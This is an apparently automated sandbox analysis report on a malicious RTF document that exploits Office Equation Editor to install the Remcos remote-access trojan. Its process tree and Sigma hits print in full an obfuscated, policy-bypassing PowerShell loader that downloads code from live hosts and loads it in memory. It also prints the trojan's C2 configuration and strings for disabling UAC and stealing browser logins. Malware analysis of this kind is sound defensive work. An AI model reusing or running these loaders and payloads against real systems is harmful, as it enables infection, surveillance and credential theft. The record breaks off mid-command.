
Windows Analysis Report
nU7Z8sPyvf.rtf

Overview

General Information

Sample name: nU7Z8sPyvf.rtf (renamed because original name is a hash value)
Original sample name: 0aba1094e29ed6d65fa5a8b1ec8c2e57.rtf
Analysis ID: 1434624
MD5: 0aba1094e29ed6d65fa5a8b1ec8c2e57
SHA1: 5eb1d60525661ec561ae7e56ed2a5798c0462c1e
SHA256: 45ba5f0e0f5ea330c12f0081f8861a75e65f2849e67038c6106930dd66543186
Tags: rtf

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Sigma detected: Remcos
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected VBS Downloader Generic
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Document exploit detected (process start blacklist hit)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1892 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 152 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3148 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • cmd.exe (PID: 3752 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs" MD5: AD7B9C14083B52BC532FBA5948342B98)
            • RegAsm.exe (PID: 3800 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
    • EQNEDT32.EXE (PID: 3420 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • wscript.exe (PID: 3968 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\antre.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
nU7Z8sPyvf.rtf | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen |
  • 0xa53:$obj2: \objdata
  • 0xa3d:$obj3: \objupdate
  • 0xa19:$obj4: \objemb
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\note\nots.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs | JoeSecurity_VBS_Downloader_Generic | Yara detected VBS Downloader Generic | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\indexphppagenotfound[1].gif | JoeSecurity_VBS_Downloader_Generic | Yara detected VBS Downloader Generic | Joe Security |
Source | Rule | Description | Author | Strings
0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown |
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
Source | Rule | Description | Author | Strings
15.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
15.2.RegAsm.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
10.2.powershell.exe.4449110.1.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
10.2.powershell.exe.4449110.1.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
15.2.RegAsm.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6aaa8:$a1: Remcos restarted by watchdog!
  • 0x6b020:$a3: %02i:%02i:%02i:%03i

Exploits

Source: Network Connection, Author: Joe Security, Data: DestinationIp: 107.172.31.6, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 152, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 152, TargetFilename: C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs

Spreading

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine|base64offs

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
Source: Network Connection, Author: Max Altgelt (Nextron Systems), Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 152, Protocol: tcp, SourceIp: 107.172.31.6, SourceIsIpv6: false, SourcePort: 80
Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine|base64offs
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4
DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
                      Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3148, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 152, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , ProcessId: 3148, ProcessName: wscript.exe
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 152, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , ProcessId: 3148, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\antre.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3544, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Path
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3148, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = 